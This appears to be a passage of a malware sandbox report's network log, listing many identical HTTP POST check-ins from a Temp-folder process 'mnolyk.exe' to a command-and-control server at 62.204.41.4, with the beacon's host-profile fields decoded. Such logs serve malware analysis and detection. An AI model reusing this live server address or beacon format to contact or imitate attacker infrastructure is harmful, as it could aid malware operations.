Feb 7, 2023 20:03:20.750307083 CET	684	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:20.814074993 CET	684	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.6	49772	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:03.779261112 CET	166	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:03.843966007 CET	166	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
530	192.168.2.6	50255	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:20.983532906 CET	685	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:21.049305916 CET	685	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
531	192.168.2.6	50256	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:21.219152927 CET	686	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:21.283005953 CET	686	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
532	192.168.2.6	50257	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:21.461330891 CET	687	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:21.526721954 CET	687	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
533	192.168.2.6	50258	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:21.947679043 CET	688	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:22.011472940 CET	688	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
534	192.168.2.6	50259	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:22.267663002 CET	689	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:22.332771063 CET	689	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
535	192.168.2.6	50260	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:22.605984926 CET	690	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:22.670617104 CET	690	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
536	192.168.2.6	50261	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:23.514341116 CET	691	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:23.579701900 CET	691	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
537	192.168.2.6	50262	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:23.849061012 CET	692	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:23.912177086 CET	692	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
538	192.168.2.6	50263	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:25.380079985 CET	693	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:25.446877956 CET	693	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
539	192.168.2.6	50264	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:25.691638947 CET	694	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:25.756413937 CET	694	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.6	49773	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:04.038337946 CET	167	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:04.103609085 CET	167	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
540	192.168.2.6	50265	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:25.941004038 CET	695	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:26.004627943 CET	695	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
541	192.168.2.6	50266	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:26.196924925 CET	696	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:26.263787031 CET	696	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
542	192.168.2.6	50267	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:26.438066959 CET	697	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:26.500848055 CET	697	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
543	192.168.2.6	50268	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:26.680608034 CET	698	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:26.744736910 CET	698	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
544	192.168.2.6	50269	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:26.932435036 CET	698	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:26.995754957 CET	699	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
545	192.168.2.6	50270	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:27.172190905 CET	700	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:27.237406015 CET	700	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
546	192.168.2.6	50271	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:27.422593117 CET	701	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:27.485740900 CET	701	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
547	192.168.2.6	50272	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:27.657285929 CET	702	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:27.720596075 CET	702	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
548	192.168.2.6	50273	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:27.900257111 CET	703	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
